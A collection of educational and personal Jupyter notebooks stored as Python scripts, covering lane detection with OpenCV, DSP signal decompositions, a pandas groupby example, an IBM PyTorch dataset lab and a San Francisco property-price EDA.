cv2.fillPoly(out_img, np.int_([right_line_pts]), (0, 0, 255))
cv2.fillPoly(out_img, np.int_([center_pts]), (0, 255, 0))
return out_img, left_fit, right_fit, curvature, offset
def fit_poly(img_shape, leftx, lefty, rightx, righty):
# Fit a second order polynomial for both the left and right lane data points
left_fit = np.polyfit(lefty, leftx, 2)
right_fit = np.polyfit(righty, rightx, 2)
# Generate x and y values for plotting
ploty = np.linspace(0, img_shape[0]-1, img_shape[0] )
try:
left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]
right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2]
except TypeError:
# Avoids an error if `left` and `right_fit` are still none or incorrect
print('The function failed to fit a line!')
left_fitx = 1*ploty**2 + 1*ploty
right_fitx = 1*ploty**2 + 1*ploty
# For the real-world polyfit
ym_per_pix = 30/720 # meters per pixel in y dimension
xm_per_pix = 3.7/700 # meters per pixel in x dimension
left_fit_rw = np.polyfit(lefty*ym_per_pix, leftx*xm_per_pix, 2)
right_fit_rw = np.polyfit(righty*ym_per_pix, rightx*xm_per_pix, 2)
return left_fitx, right_fitx, left_fit_rw, right_fit_rw, ploty
def windowHistograms(image):
# Take a histogram of the bottom half of the image
histogram = np.sum(image[image.shape[0]//2:,:], axis=0)
# Find the peak of the left and right halves of the histogram
# These will be the starting point for the left and right lines
midpoint = np.int(histogram.shape[0]//2)
leftx_base = np.argmax(histogram[:midpoint])
rightx_base = np.argmax(histogram[midpoint:]) + midpoint
# Hyperparamters
# Choose the number of sliding windows
nwindows = 9
# Set the width of the windows +/- margin
margin = 80
# Set minimum number of pixels found to recenter window
minpix = 30
# Set height of windows - based on nwindows above and image shape
window_height = np.int(image.shape[0]//nwindows)
# Identify the x and y positions of all nonzero pixels in the image
nonzero = image.nonzero()
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
# Current positions to be updated later for each window in nwindows
leftx_current = leftx_base
rightx_current = rightx_base
# Create empty lists to receive left and right lane pixel indices
left_lane_inds = []
right_lane_inds = []
# Step through the windows one by one
for window in range(nwindows):
# Identify window boundaries in x and y (and right and left)
win_y_low = image.shape[0] - (window+1)*window_height
win_y_high = image.shape[0] - window*window_height
win_xleft_low = leftx_current - margin
win_xleft_high = leftx_current + margin
win_xright_low = rightx_current - margin
win_xright_high = rightx_current + margin
# Identify non-zero pixels that are within the window bounds for each window
good_left_inds = ((nonzeroy < win_y_high) & (nonzeroy >= win_y_low) &
(nonzerox < win_xleft_high) & (nonzerox >= win_xleft_low)).nonzero()[0]
good_right_inds = ((nonzeroy < win_y_high) & (nonzeroy >= win_y_low) *
(nonzerox < win_xright_high) & (nonzerox >= win_xright_low)).nonzero()[0]
# Append these indices to the lists
left_lane_inds.append(good_left_inds)
right_lane_inds.append(good_right_inds)
# Change the next rectangle's center location if the number of detected pixels
# exceed the minimum threshold
if (len(good_left_inds) > minpix):
leftx_current = np.int(np.mean(nonzerox[good_left_inds]))
if (len(good_right_inds) > minpix):
rightx_current = np.int(np.mean(nonzerox[good_right_inds]))
# Concatenate the arrays of indices (previously was a list of lists of pixels)
try:
left_lane_inds = np.concatenate(left_lane_inds)
right_lane_inds = np.concatenate(right_lane_inds)
except ValueError:
# Avoids an error if the above is not implemented fully
pass
# Extract left and right line pixel positions
leftx = nonzerox[left_lane_inds]
lefty = nonzeroy[left_lane_inds]
rightx = nonzerox[right_lane_inds]
righty = nonzeroy[right_lane_inds]
return leftx, lefty, rightx, righty
def searchAroundPoly(image, left_fit, right_fit):
# Hyperparamter - width of the search +_polynomial curve
margin = 60
# Grab activated pixels
nonzero = binary_warped.nonzero()
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
# Calculate indices that fit within the margins of the polynomial curve
left_margins = left_fit[0]*(nonzeroy**2) + left_fit[1]*nonzeroy + left_fit[2]
right_margins = right_fit[0]*(nonzeroy**2) + right_fit[1]*nonzeroy + right_fit[2]
left_lane_inds = ((nonzerox < left_margins + margin) & (nonzerox > left_margins
- margin))
right_lane_inds = ((nonzerox < right_margins + margin) & (nonzerox > right_margins
- margin))
# Extract left and right line pixel positions
leftx = nonzerox[left_lane_inds]
lefty = nonzeroy[left_lane_inds]
rightx = nonzerox[right_lane_inds]
righty = nonzeroy[right_lane_inds]
return leftx, lefty, rightx, righty
# ## 6. Lane Curvature
def measure_curvature_real(ploty, left_fit, right_fit):
# Using the left/right fit in meters, calculate the curvature at the bottom of the image
y_eval = np.max(ploty)
# Using the curve as f(y) = Ay^2 + By + C:
# The curvature can be estimated as: (1+(2Ay+B)^2)^(3/2)/|2A|
left_curverad = ((1 + (2*left_fit[0]*y_eval + left_fit[1])**2)**1.5) / np.absolute(2*left_fit[0])
right_curverad = ((1 + (2*right_fit[0]*y_eval + right_fit[1])**2)**1.5) / np.absolute(2*right_fit[0])
return np.int((left_curverad + right_curverad)//2)
# ## 7. Inverse Perspective Transform and Text Overlay
def inversePerspectiveTransform(img):
# Estimated source and destination values for a bird's eye view of the road
# Values were determined using estimates from two straight line images
h = img.shape[0]
w = img.shape[1]
img_size = (w,h)
mid_offset = 90
# Top left, top right, bottom left, bottom right
src = np.float32([[w/2-mid_offset, 460], [w/2+mid_offset, 460], [0, h-15], [w, h-15]])
dst = np.float32([[0, 0], [w, 0], [0, h], [w, h]])
# Given src and dst points, calculate the perspective transform matrix
Minv = cv2.getPerspectiveTransform(dst, src)
# Warp the image using OpenCV warpPerspective()
transformed = cv2.warpPerspective(img, Minv, img_size, flags=cv2.INTER_LINEAR)
# Return the resulting image and matrix
return transformed
def addText(img, curvature, offset):
# Font and sizes is a default CV2 font
font = cv2.FONT_HERSHEY_SIMPLEX
# Positioned to be in the top left corner with 50px margins
bottomLeftCornerOfText1 = (50,50)
bottomLeftCornerOfText2 = (50,100)
fontScale = 1
# White color
fontColor = (255,255,255)
lineType = 2
# Depending on the vehicle offset, different words are used to maintain a positive value shown
if (offset == 0):
text1 = f"Radius of Curvature = {curvature}m"
text2 = "Vehicle is centered"
elif (offset < 0):
offset = np.abs(offset)
text1 = f"Radius of Curvature = {curvature}m"
text2 = f"Vehicle is {offset:.2}m left of center"
else:
text1 = f"Radius of Curvature = {curvature}m"
text2 = f"Vehicle is {offset:.2}m right of center"
# Text is placed onto the image and returned
cv2.putText(img, text1, bottomLeftCornerOfText1, font, fontScale, fontColor, lineType)
cv2.putText(img, text2, bottomLeftCornerOfText2, font, fontScale, fontColor, lineType)
# ## Full Image Processing
def process_image(img):
# Uses the left and right fits
global left_fit, right_fit
# Calibrate the camera to fix distotions using checkerboard patterns taken from the same camera
mtx, dist = cameraCalibration()
calibrated = undistort(img, mtx, dist)
# Pipeline for color and gradient thresholding for a binary image of detected pixels
binary = colorGradient(calibrated)
# Perspective transform binary pixels into a bird's eye view
transformed = perspectiveTransform(binary)
# Lane is detected using window sections of polynomial margins, depending on if it's the first iteration
curve, left_fit, right_fit, curvature, offset = detectLane(transformed, left_fit, right_fit)
# Inverse transform the image back to the original shape
inverse = inversePerspectiveTransform(curve)
# Add the text for curvature and car position offset
addText(img, curvature, offset)
# The detected lane markings are overlaid with a 50% opacity before returning
result = cv2.addWeighted(img, 1, inverse, 0.5, 0)
return result
# Testing Purposes only
left_fit = [0,0,0]
right_fit = [0,0,0]
img = cv2.imread('test_images/test5.jpg')
out = process_image(img)
cv2.imwrite('report_images/final_image.jpg', out)
cv2.imshow('image', out)
# ### Applied to a Video
# left_fit = [0,0,0]
# right_fit = [0,0,0]
# video_output = 'project_video_output.mp4'
#
# clip = VideoFileClip("project_video.mp4")
# video_clip = clip.fl_image(process_image)
# # %time video_clip.write_videofile(video_output, audio=False)
# HTML("""
# <video width="1280" height="720" controls>
# <source src="{0}">
# </video>
# """.format(video_output))
|
project_2_advanced_lane_finder.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Common Decompositions
# The goal of this method is to replace a complicated problem with several easy ones. If the decomposition doesn't simplify the situation in some way, then nothing has been gained. Int this notebook four types of decompositions are presented:
#
# 1. Impulse Decomposition
# 2. Step Decomposition
# 3. Even/Odd Decomposition
# 4. Interlaced Decomposition
# +
import sys
sys.path.insert(0, '../../')
import numpy as np
import matplotlib.pyplot as plt
from Common import common_plots
cplots = common_plots.Plot()
# -
x = np.array([[4,2,-3,6,1,7,-4, 3]])
#x = np.random.rand(1,15)
cplots.plot_single(x)
# ## 1. Impulse Decomposition
# Impulse decomposition breaks an $N$ samples signal into $N$ component signals, each containing $N$ samples. Each of the component signals contains one point from the original signal, with the remainder of the values being zero. A single nonzero point in a string of zeros is called an impulse. Impulse decomposition is important because it **allows signals to be examined one sample at a time**. Similarly, systems are characterized by how they respond to impulses. By knowing how a system responds to an impulse, the system's output can be calculated for any given input.
N = x.shape[1]
x_impulse = np.zeros((N,N))
# +
for i in range(N):
x_impulse[i][i]=x[0][i]
print(x_impulse)
# -
cplots.plot_multiple(x_impulse)
# ## 2. Step Decomposition
# Step decomposition also breaks an $N$ sample signal into $N$ component signals, each composed of $N$ samples. Each component signal is a step, that is, the first samples have a value of zero, while the last samples are some constant value. Consider the decomposition of an $N$ point signal, $x[n]$, into the components: $x_0[n], x_1[n], x_2[n], \dots, x_{N-1}[n]$. The $k^{th}$ component signal, $x_k[n]$, is composed of zeros for points $0$ through $k - 1$, while the remaining points have a value of: $x[k] - x[k-1]$.
x_step = np.zeros((N,N))
x_step[0][:] = x[0][0]
for i in range(1,N):
x_step[i][i:] = x[0][i]-x[0][i-1]
print(x_step)
cplots.plot_multiple(x_step)
# ## 3. Even/Odd Decomposition
# The even/odd decomposition breaks a signal into two component signals, one having **even symmetry** and the other having **odd symmetry**. An N point signal is said to have even symmetry if it is a mirror image around point $N/2$. Odd symmetry occurs when the matching points have equal magnitudes but are opposite in sign.
#
# The following definitions assume that the signal is composed of an **even number of samples**, and that the indexes run from $0$ to $N-1$. The decomposition is calculated form the relations:
#
# $$x_E[n]=\frac{x[n]+x[N-n]}{2}$$
#
# $$x_O[n]=\frac{x[n]-x[N-n]}{2}$$
def circular_flip(x):
"""
Function that flips an array x in a circular form.
Parameters:
x (numpy array): Array of numbers representing the input signal to be transformed.
Returns:
numpy array: Returns flipped values of an input x in the form [x[0], x[N-1], x[N-2] ... x[1]]
"""
return np.insert(np.flip(x[0][1:]).reshape(-1),0,x[0][0])
# +
x = np.array([[0,1,2,3,4,5]])
x_N = circular_flip(x)
x_E = (x + x_N)/2.0
x_O = (x - x_N)/2.0
# +
plt.rcParams["figure.figsize"] = (15,5)
plt.subplot(1,3,1)
cplots.plot_single(x_E, "Even Decomposition of x")
plt.subplot(1,3,2)
cplots.plot_single(x_O, "Odd Decomposition of x")
plt.subplot(1,3,3)
cplots.plot_single(x_E + x_O, "Signal x")
# -
# For an **odd number of samples**, and that the indexes run from $0$ to $𝑁−1$. The decomposition is calculated as follows:
# +
x = np.array([[0,1,2,3,4,5,6]])
x_N = np.flip(x) #Note that there is no circular flip
x_E = (x + x_N)/2.0
x_O = (x - x_N)/2.0
# +
plt.rcParams["figure.figsize"] = (15,5)
plt.subplot(1,3,1)
cplots.plot_single(x_E, "Even Decomposition of x")
plt.ylim((-1,4))
plt.subplot(1,3,2)
cplots.plot_single(x_O, "Odd Decomposition of x")
plt.subplot(1,3,3)
cplots.plot_single(x_E + x_O, "Signal x")
# -
# ## 4. Interlaced Decomposition
# The interlaced decomposition breaks the signal into two component signals, the even sample signal and the odd sample signal (not to be confused with even and odd symmetry signals). To find the even sample signal, start with the original signal and set all of the odd numbered samples to zero. To find the odd sample signal, start with the original signal and set all of the even numbered samples to zero.
#
# At first glance, this decomposition might seem trivial and uninteresting. This is ironic, because the interlaced decomposition is the basis for an extremely important algorithm in DSP, the Fast Fourier Transform (FFT). The procedure for calculating the Fourier decomposition has been know for several hundred years. Unfortunately, it is frustratingly slow, often requiring minutes or hours to execute on present day computers. The FFT is a family of algorithms developed in the 1960s to reduce this computation time. The strategy is an exquisite example of DSP: **reduce the signal to elementary components by repeated use of the interlace transform**; **calculate the Fourier decomposition of the individual components**; **synthesized the results into the final answer**. The results are dramatic; it is common for the speed to be improved by a factor of hundreds or thousands.
# +
x_E = np.zeros(x.shape)
x_O = np.zeros(x.shape)
x_E[0][::2]=x[0][::2]
x_O[0][1::2]=x[0][1::2]
# +
plt.rcParams["figure.figsize"] = (15,5)
plt.subplot(1,3,1)
cplots.plot_single(x_E, "Even Decomposition of x")
plt.subplot(1,3,2)
cplots.plot_single(x_O, "Odd Decomposition of x")
plt.subplot(1,3,3)
cplots.plot_single(x_E + x_O, "Signal x")
# -
# ## Exercise for Common Decompositions
# For a given input signal x calculate the:
# 1. Impulse Decomposition
# 2. Step Decomposition
# 3. Even/Odd Decomposition
# 4. Interlaced Decomposition
#
# by calling the functions `impulse`, `step`, `even_odd` and `interlaced`
# +
def impulse(x):
"""
Function that calculates the impulse decomposition of a signal x.
Parameters:
x (numpy array): Array of numbers representing the input signal to be decomposed.
Returns:
numpy array: Returns a matrix of size x.shape[1] by x.shape[1] where each row represents
the impulse decomposition of the n-th sample.
"""
impulse_decomposition = None
return impulse_decomposition
def step(x):
"""
Function that calculates the step decomposition of a signal x.
Parameters:
x (numpy array): Array of numbers representing the input signal to be decomposed.
Returns:
numpy array: Returns a matrix of size x.shape[1] by x.shape[1] where each row represents
the step decomposition of the n-th sample.
"""
step_decomposition = None
return step_decomposition
def even_odd(x):
"""
Function that calculates the even/odd decomposition of a signal x.
Parameters:
x (numpy array): Array of numbers representing the input signal to be decomposed.
Returns:
x_E (numpy array): Array representing the even decomposition of signal x
x_O (numpy array): Array representing the odd decomposition of signal x
"""
x_E = None
x_O = None
return x_E, x_O
def interlaced(x):
"""
Function that calculates the interlaced decomposition of a signal x.
Parameters:
x (numpy array): Array of numbers representing the input signal to be decomposed.
Returns:
x_E (numpy array): Array representing the even-interlaced decomposition of signal x
x_O (numpy array): Array representing the odd-interlaced decomposition of signal x
"""
x_E = None
x_O = None
return x_E, x_O
# -
# ## Test Cases
# +
import pickle
# open a file, where you stored the pickled data
file = open('solution_common_decompositions.pkl', 'rb')
# dump information to that file
solution = pickle.load(file)
# close the file
file.close()
# +
np.random.seed(1)
x1 = np.random.rand(1,200)
x_impulse = impulse(x1)
assert(np.array_equal(x_impulse, solution['X1']['x_impulse'])), 'error in impulse function'
x_step = step(x1)
assert(np.array_equal(x_step, solution['X1']['x_step'])), 'error in step function'
x_E, x_O = even_odd(x1)
assert(np.array_equal(x_E, solution['X1']['x_E'])), 'error in even/odd decomposition function'
assert(np.array_equal(x_O, solution['X1']['x_O'])), 'error in even/odd decomposition function'
x_iE, x_iO = interlaced(x1)
assert(np.array_equal(x_iE, solution['X1']['x_iE'])), 'error in interlaced decomposition function'
assert(np.array_equal(x_iO, solution['X1']['x_iO'])), 'error in interlaced decomposition function'
# +
np.random.seed(1)
x2 = np.random.rand(1,201)
x_impulse = impulse(x2)
assert(np.array_equal(x_impulse, solution['X2']['x_impulse'])), 'error in impulse function'
x_step = step(x2)
assert(np.array_equal(x_step, solution['X2']['x_step'])), 'error in step function'
x_E, x_O = even_odd(x2)
assert(np.array_equal(x_E, solution['X2']['x_E'])), 'error in even/odd decomposition function'
assert(np.array_equal(x_O, solution['X2']['x_O'])), 'error in even/odd decomposition function'
x_iE, x_iO = interlaced(x2)
assert(np.array_equal(x_iE, solution['X2']['x_iE'])), 'error in interlaced decomposition function'
assert(np.array_equal(x_iO, solution['X2']['x_iO'])), 'error in interlaced decomposition function'
# -
|
05_Decompositions/Student/Common Decompositions.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
from importlib import *
import shiroin
reload(shiroin)
from IPython.display import Latex
from shiroindev import *
from sympy import *
shiro.display=lambda x:display(Latex(x))
prove('2*(a^2+b^2+c^2-a*b-a*c-b*c)')
ineqs2
x=S("a^2+b^2+c^2")
latex(latex(x))
|
playground.ipynb
|
# ---
# title: "Grouping Rows In pandas"
# author: "<NAME>"
# date: 2017-12-20T11:53:49-07:00
# description: "Grouping Rows In pandas."
# type: technical_note
# draft: false
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# Import modules
import pandas as pd
# Example dataframe
raw_data = {'regiment': ['Nighthawks', 'Nighthawks', 'Nighthawks', 'Nighthawks', 'Dragoons', 'Dragoons', 'Dragoons', 'Dragoons', 'Scouts', 'Scouts', 'Scouts', 'Scouts'],
'company': ['1st', '1st', '2nd', '2nd', '1st', '1st', '2nd', '2nd','1st', '1st', '2nd', '2nd'],
'name': ['Miller', 'Jacobson', 'Ali', 'Milner', 'Cooze', 'Jacon', 'Ryaner', 'Sone', 'Sloan', 'Piger', 'Riani', 'Ali'],
'preTestScore': [4, 24, 31, 2, 3, 4, 24, 31, 2, 3, 2, 3],
'postTestScore': [25, 94, 57, 62, 70, 25, 94, 57, 62, 70, 62, 70]}
df = pd.DataFrame(raw_data, columns = ['regiment', 'company', 'name', 'preTestScore', 'postTestScore'])
df
# Create a grouping object. In other words, create an object that
# represents that particular grouping. In this case we group
# pre-test scores by the regiment.
regiment_preScore = df['preTestScore'].groupby(df['regiment'])
# Display the mean value of the each regiment's pre-test score
regiment_preScore.mean()
|
docs/python/data_wrangling/pandas_group_rows_by.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# <center>
# <img src="https://cf-courses-data.s3.us.cloud-object-storage.appdomain.cloud/IBMDeveloperSkillsNetwork-DL0110EN-SkillsNetwork/Template/module%201/images/IDSNlogo.png" width="300" alt="cognitiveclass.ai logo" />
# </center>
#
# <h1>Simple Dataset</h1>
#
# <h2>Objective</h2><ul><li> How to create a dataset in pytorch.</li><li> How to perform transformations on the dataset.</li></ul>
#
# <h2>Table of Contents</h2>
#
# <p>In this lab, you will construct a basic dataset by using PyTorch and learn how to apply basic transformations to it.</p>
# <ul>
# <li><a href="#Simple_Dataset">Simple dataset</a></li>
# <li><a href="#Transforms">Transforms</a></li>
# <li><a href="#Compose">Compose</a></li>
# </ul>
# <p>Estimated Time Needed: <strong>30 min</strong></p>
# <hr>
#
# <h2>Preparation</h2>
#
# The following are the libraries we are going to use for this lab. The <code>torch.manual_seed()</code> is for forcing the random function to give the same number every time we try to recompile it.
#
# +
# These are the libraries will be used for this lab.
import torch
from torch.utils.data import Dataset
torch.manual_seed(1)
# -
# <!--Empty Space for separating topics-->
#
# <h2 id="Simple_Dataset">Simple dataset</h2>
#
# Let us try to create our own dataset class.
#
# +
# Define class for dataset
class toy_set(Dataset):
# Constructor with defult values
def __init__(self, length = 100, transform = None):
self.len = length
self.x = 2 * torch.ones(length, 2)
self.y = torch.ones(length, 1)
self.transform = transform
# Getter
def __getitem__(self, index):
sample = self.x[index], self.y[index]
if self.transform:
sample = self.transform(sample)
return sample
# Get Length
def __len__(self):
return self.len
# -
# Now, let us create our <code>toy_set</code> object, and find out the value on index 1 and the length of the inital dataset
#
# +
# Create Dataset Object. Find out the value on index 1. Find out the length of Dataset Object.
our_dataset = toy_set()
print("Our toy_set object: ", our_dataset)
print("Value on index 0 of our toy_set object: ", our_dataset[0])
print("Our toy_set length: ", len(our_dataset))
# -
# As a result, we can apply the same indexing convention as a <code>list</code>,
# and apply the fuction <code>len</code> on the <code>toy_set</code> object. We are able to customize the indexing and length method by <code>def __getitem__(self, index)</code> and <code>def __len__(self)</code>.
#
# Now, let us print out the first 3 elements and assign them to x and y:
#
# +
# Use loop to print out first 3 elements in dataset
for i in range(3):
x, y=our_dataset[i]
print("index: ", i, '; x:', x, '; y:', y)
# -
# The dataset object is an Iterable; as a result, we apply the loop directly on the dataset object
#
for x,y in our_dataset:
print(' x:', x, 'y:', y)
# <!--Empty Space for separating topics-->
#
# <h3>Practice</h3>
#
# Try to create an <code>toy_set</code> object with length <b>50</b>. Print out the length of your object.
#
# +
# Practice: Create a new object with length 50, and print the length of object out.
# Type your code here
# -
# Double-click <b>here</b> for the solution.
#
# <!--
# my_dataset = toy_set(length = 50)
# print("My toy_set length: ", len(my_dataset))
# -->
#
# <!--Empty Space for separating topics-->
#
# <h2 id="Transforms">Transforms</h2>
#
# You can also create a class for transforming the data. In this case, we will try to add 1 to x and multiply y by 2:
#
# +
# Create tranform class add_mult
class add_mult(object):
# Constructor
def __init__(self, addx = 1, muly = 2):
self.addx = addx
self.muly = muly
# Executor
def __call__(self, sample):
x = sample[0]
y = sample[1]
x = x + self.addx
y = y * self.muly
sample = x, y
return sample
# -
# <!--Empty Space for separating topics-->
#
# Now, create a transform object:.
#
# +
# Create an add_mult transform object, and an toy_set object
a_m = add_mult()
data_set = toy_set()
# -
# Assign the outputs of the original dataset to <code>x</code> and <code>y</code>. Then, apply the transform <code>add_mult</code> to the dataset and output the values as <code>x_</code> and <code>y_</code>, respectively:
#
# +
# Use loop to print out first 10 elements in dataset
for i in range(10):
x, y = data_set[i]
print('Index: ', i, 'Original x: ', x, 'Original y: ', y)
x_, y_ = a_m(data_set[i])
print('Index: ', i, 'Transformed x_:', x_, 'Transformed y_:', y_)
# -
# As the result, <code>x</code> has been added by 1 and y has been multiplied by 2, as <i>[2, 2] + 1 = [3, 3]</i> and <i>[1] x 2 = [2]</i>
#
# <!--Empty Space for separating topics-->
#
# We can apply the transform object every time we create a new <code>toy_set object</code>? Remember, we have the constructor in toy_set class with the parameter <code>transform = None</code>.
# When we create a new object using the constructor, we can assign the transform object to the parameter transform, as the following code demonstrates.
#
# +
# Create a new data_set object with add_mult object as transform
cust_data_set = toy_set(transform = a_m)
# -
# This applied <code>a_m</code> object (a transform method) to every element in <code>cust_data_set</code> as initialized. Let us print out the first 10 elements in <code>cust_data_set</code> in order to see whether the <code>a_m</code> applied on <code>cust_data_set</code>
#
# +
# Use loop to print out first 10 elements in dataset
for i in range(10):
x, y = data_set[i]
print('Index: ', i, 'Original x: ', x, 'Original y: ', y)
x_, y_ = cust_data_set[i]
print('Index: ', i, 'Transformed x_:', x_, 'Transformed y_:', y_)
# -
# The result is the same as the previous method.
#
# <!--Empty Space for separating topics-->
#
# +
# Practice: Construct your own my_add_mult transform. Apply my_add_mult on a new toy_set object. Print out the first three elements from the transformed dataset.
# Type your code here.
# -
# Double-click <b>here</b> for the solution.
#
# <!--
# class my_add_mult(object):
# def __init__(self, add = 2, mul = 10):
# self.add=add
# self.mul=mul
#
# def __call__(self, sample):
# x = sample[0]
# y = sample[1]
# x = x + self.add
# y = y + self.add
# x = x * self.mul
# y = y * self.mul
# sample = x, y
# return sample
#
#
# my_dataset = toy_set(transform = my_add_mult())
# for i in range(3):
# x_, y_ = my_dataset[i]
# print('Index: ', i, 'Transformed x_:', x_, 'Transformed y_:', y_)
#
# -->
#
# <!--Empty Space for separating topics-->
#
# <h2 id="Compose">Compose</h2>
#
# You can compose multiple transforms on the dataset object. First, import <code>transforms</code> from <code>torchvision</code>:
#
# +
# Run the command below when you do not have torchvision installed
# # !conda install -y torchvision
from torchvision import transforms
# -
# Then, create a new transform class that multiplies each of the elements by 100:
#
# +
# Create tranform class mult
class mult(object):
# Constructor
def __init__(self, mult = 100):
self.mult = mult
# Executor
def __call__(self, sample):
x = sample[0]
y = sample[1]
x = x * self.mult
y = y * self.mult
sample = x, y
return sample
# -
# Now let us try to combine the transforms <code>add_mult</code> and <code>mult</code>
#
# +
# Combine the add_mult() and mult()
data_transform = transforms.Compose([add_mult(), mult()])
print("The combination of transforms (Compose): ", data_transform)
# -
# The new <code>Compose</code> object will perform each transform concurrently as shown in this figure:
#
# <img src="https://s3-api.us-geo.objectstorage.softlayer.net/cf-courses-data/CognitiveClass/DL0110EN/notebook_images%20/chapter%201/1.3.1_trasform.png" width="500" alt="Compose PyTorch">
#
data_transform(data_set[0])
# +
x,y=data_set[0]
x_,y_=data_transform(data_set[0])
print( 'Original x: ', x, 'Original y: ', y)
print( 'Transformed x_:', x_, 'Transformed y_:', y_)
# -
# Now we can pass the new <code>Compose</code> object (The combination of methods <code>add_mult()</code> and <code>mult</code>) to the constructor for creating <code>toy_set</code> object.
#
# +
# Create a new toy_set object with compose object as transform
compose_data_set = toy_set(transform = data_transform)
# -
# Let us print out the first 3 elements in different <code>toy_set</code> datasets in order to compare the output after different transforms have been applied:
#
# +
# Use loop to print out first 3 elements in dataset
for i in range(3):
x, y = data_set[i]
print('Index: ', i, 'Original x: ', x, 'Original y: ', y)
x_, y_ = cust_data_set[i]
print('Index: ', i, 'Transformed x_:', x_, 'Transformed y_:', y_)
x_co, y_co = compose_data_set[i]
print('Index: ', i, 'Compose Transformed x_co: ', x_co ,'Compose Transformed y_co: ',y_co)
# -
# Let us see what happened on index 0. The original value of <code>x</code> is <i>[2, 2]</i>, and the original value of <code>y</code> is [1]. If we only applied <code>add_mult()</code> on the original dataset, then the <code>x</code> became <i>[3, 3]</i> and y became <i>[2]</i>. Now let us see what is the value after applied both <code>add_mult()</code> and <code>mult()</code>. The result of x is <i>[300, 300]</i> and y is <i>[200]</i>. The calculation which is equavalent to the compose is <i> x = ([2, 2] + 1) x 100 = [300, 300], y = ([1] x 2) x 100 = 200</i>
#
# <h3>Practice</h3>
#
# Try to combine the <code>mult()</code> and <code>add_mult()</code> as <code>mult()</code> to be executed first. And apply this on a new <code>toy_set</code> dataset. Print out the first 3 elements in the transformed dataset.
#
# +
# Practice: Make a compose as mult() execute first and then add_mult(). Apply the compose on toy_set dataset. Print out the first 3 elements in the transformed dataset.
# Type your code here.
# -
# Double-click <b>here</b> for the solution.
#
# <!--
# my_compose = transforms.Compose([mult(), add_mult()])
# my_transformed_dataset = toy_set(transform = my_compose)
# for i in range(3):
# x_, y_ = my_transformed_dataset[i]
# print('Index: ', i, 'Transformed x_:', x_, 'Transformed y_:', y_)
# -->
#
# <a href="https://dataplatform.cloud.ibm.com/registration/stepone?context=cpdaas&apps=data_science_experience,watson_machine_learning"><img src="https://cf-courses-data.s3.us.cloud-object-storage.appdomain.cloud/IBMDeveloperSkillsNetwork-DL0110EN-SkillsNetwork/Template/module%201/images/Watson_Studio.png"/></a>
#
# <h2>About the Authors:</h2>
#
# <a href="https://www.linkedin.com/in/joseph-s-50398b136/"><NAME></a> has a PhD in Electrical Engineering, his research focused on using machine learning, signal processing, and computer vision to determine how videos impact human cognition. Joseph has been working for IBM since he completed his PhD.
#
# Other contributors: <a href="https://www.linkedin.com/in/michelleccarey/"><NAME></a>, <a href="www.linkedin.com/in/jiahui-mavis-zhou-a4537814a"><NAME></a>
#
# ## Change Log
#
# | Date (YYYY-MM-DD) | Version | Changed By | Change Description |
# | ----------------- | ------- | ---------- | ----------------------------------------------------------- |
# | 2020-09-21 | 2.0 | Shubham | Migrated Lab to Markdown and added to course repo in GitLab |
#
# <hr>
#
# ## <h3 align="center"> © IBM Corporation 2020. All rights reserved. <h3/>
#
|
04-simple_data_set_v2.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## DATA CLEANING AND EDA 1
# +
# import required packages
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
# %matplotlib inline
# %config InlineBackend.figure_format = 'svg'
plt.style.use("seaborn")
# -
df = pd.read_pickle("project2_data/SFproperty_df")
df.info()
# ### Check the dataset: <br> (1) Convert data to appropriate types <br> (2) Check out records that don't seem to make sense
# check for duplicates(2 of them) and drop the record with less info
df["Address"].duplicated().sum()
df[df["Address"].duplicated()]
print(df[df["Address"] == "2031 Hayes St"])
df.drop_duplicates(subset = ["Address"], inplace = True)
# check after duplicate removal
df.groupby(["Address", "Zip Code"])["Address"].count().sort_values(ascending = False).head()
# +
# removing symbols in house Price
df["Price"] = ["".join(p.strip("$").split(",")) for p in df["Price"]]
# convert Price to numbers and check for missing values
df["Price"] = pd.to_numeric(df["Price"])
# -
# look at property price distribution (Note: distribution is right skewed)
# plt.rcParams["figure.figsize"] = [5,3]
# plt.rcParams["figure.dpi"] = 200
plt.hist(df["Price"], bins = 100)
plt.title("SF Property Price Distribution from 2020 to 2021", fontsize = 15)
plt.ylabel("Number of Properties", fontsize = 12)
plt.xlabel("Property Price in USD", fontsize = 12);
#plt.savefig("project2_images/histogram_property_price.png");
# +
# # seaborn histogram, with density curve
# sns.set_style("darkgrid")
# price_hist = sns.histplot(df["Price"], bins=100, kde=True)
# price_hist.set(xlabel="Number of Property", ylabel="Property Price in USD")
# plt.title("SF Property Price Distribution from 2020 to 2021", fontsize=15);
# +
# check outliers, how should outliers be defined?
# houses cost > 5mil don't seem to be particularly out of the ordinary since their sizes are huge
print(df["Price"].describe())
print(len(df[df["Price"] > 5000000]))
print(len(df[df["Price"] < 500000]))
# df[df["Price"] > 5000000].sort_values("Price", ascending = False)
# to make notebook display less cluttered
df[df["Price"] > 5000000].sort_values("Price", ascending = False).head()
# +
# df[df["Price"] < 500000].sort_values("Price")
# to make notebook display less cluttered
df[df["Price"] < 500000].sort_values("Price").head()
# -
# NOTES: Could try removing properties > 10mil and <200k in later analysis
# drop a record with Price misrecorded (much higher price listed in other websites)
df.drop(df[df["Price"] == 27000].index, inplace = True)
# +
# apply log transformation to price(now approximately normal)
log_Price = np.log(df["Price"])
